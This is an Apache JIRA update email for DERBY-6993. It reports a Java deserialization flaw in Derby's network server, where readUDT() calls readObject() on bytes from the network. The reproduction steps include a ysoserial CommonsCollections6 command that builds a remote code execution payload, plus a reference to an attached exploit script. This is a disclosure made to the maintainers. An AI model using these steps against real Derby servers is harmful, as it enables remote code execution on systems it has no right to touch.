[ https://issues.apache.org/jira/browse/DERBY-6993?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Ricter Zheng updated DERBY-6993: -------------------------------- Description: In` src\java\drda\org\apache\derby\impl\drda\DRDAConnThread.java {code:java} /** Read a UDT from the stream */ private Object readUDT() throws DRDAProtocolException { int length = reader.readNetworkShort(); //protocol control data always follows big endian if (SanityManager.DEBUG) { trace("===== udt param length is: " + length); } byte[] bytes = reader.readBytes(length); try { ByteArrayInputStream bais = new ByteArrayInputStream( bytes ); ObjectInputStream ois = new ObjectInputStream( bais ); return ois.readObject(); } catch (Exception e) { markCommunicationsFailure ( e,"DRDAConnThread.readUDT()", "", e.getMessage(), "*" ); return null; } {code} `return ois.readObject();` cause a deserialization vulnerability. Launch derby with a vulnerability Java library and `-noSecuriyManager` options {code:java} "C:\Program Files\Java\jdk1.8.0_144\bin\java.exe" -classpath "C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derby.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0 -bin\bin\../lib/derbynet.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyclient.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbytools.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyoptionaltools.jar;..\lib\commons-collections.jar" org.apache.derby.drda.NetworkServerControl start -noSecurityManager{code} Generate a Java deserialization payload use ysoserial: {code:java} java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 calc > /path/to/exp.py/payload.data{code} Then run the script in the attachment, will execute `calc`. {code:java} python exp.py{code} !image-2018-03-27-11-42-23-176.png! was: Launch derby with a vulnerability Java library and `-noSecuriyManager` options {code:java} "C:\Program Files\Java\jdk1.8.0_144\bin\java.exe" -classpath "C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derby.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0 -bin\bin\../lib/derbynet.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyclient.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbytools.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyoptionaltools.jar;..\lib\commons-collections.jar" org.apache.derby.drda.NetworkServerControl start -noSecurityManager{code} Generate a Java deserialization payload use ysoserial: {code:java} java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 calc > /path/to/exp.py/payload.data{code} Then run the script in the attachment, will execute `calc`. {code:java} python exp.py{code} !image-2018-03-27-11-42-23-176.png! > Derby Deserialization Vulnerability Leads to RCE > ------------------------------------------------ > > Key: DERBY-6993 > URL: https://issues.apache.org/jira/browse/DERBY-6993 > Project: Derby > Issue Type: Bug > Affects Versions: 10.14.1.0 > Environment: Windows 10 > Reporter: Ricter Zheng > Priority: Major > Attachments: image-2018-03-27-11-42-23-176.png > > > In` src\java\drda\org\apache\derby\impl\drda\DRDAConnThread.java > > {code:java} > /** Read a UDT from the stream */ > private Object readUDT() throws DRDAProtocolException > { > int length = reader.readNetworkShort(); //protocol control data always > follows big endian > if (SanityManager.DEBUG) { trace("===== udt param length is: " + length); > } > byte[] bytes = reader.readBytes(length); > > try { > ByteArrayInputStream bais = new ByteArrayInputStream( bytes ); > ObjectInputStream ois = new ObjectInputStream( bais ); > return ois.readObject(); > } > catch (Exception e) > { > markCommunicationsFailure > ( e,"DRDAConnThread.readUDT()", "", e.getMessage(), "*" ); > return null; > } > {code} > `return ois.readObject();` cause a deserialization vulnerability. > > > Launch derby with a vulnerability Java library and `-noSecuriyManager` options > > {code:java} > "C:\Program Files\Java\jdk1.8.0_144\bin\java.exe" -classpath > "C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derby.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0 > > -bin\bin\../lib/derbynet.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyclient.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbytools.jar;C:\Users\ricterzheng\Downloads\db-derby-10.14.1.0-bin\bin\../lib/derbyoptionaltools.jar;..\lib\commons-collections.jar" > org.apache.derby.drda.NetworkServerControl start -noSecurityManager{code} > > Generate a Java deserialization payload use ysoserial: > > {code:java} > java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 calc > > /path/to/exp.py/payload.data{code} > > Then run the script in the attachment, will execute `calc`. > {code:java} > python exp.py{code} > !image-2018-03-27-11-42-23-176.png! > -- This message was sent by Atlassian JIRA (v7.6.3#76005)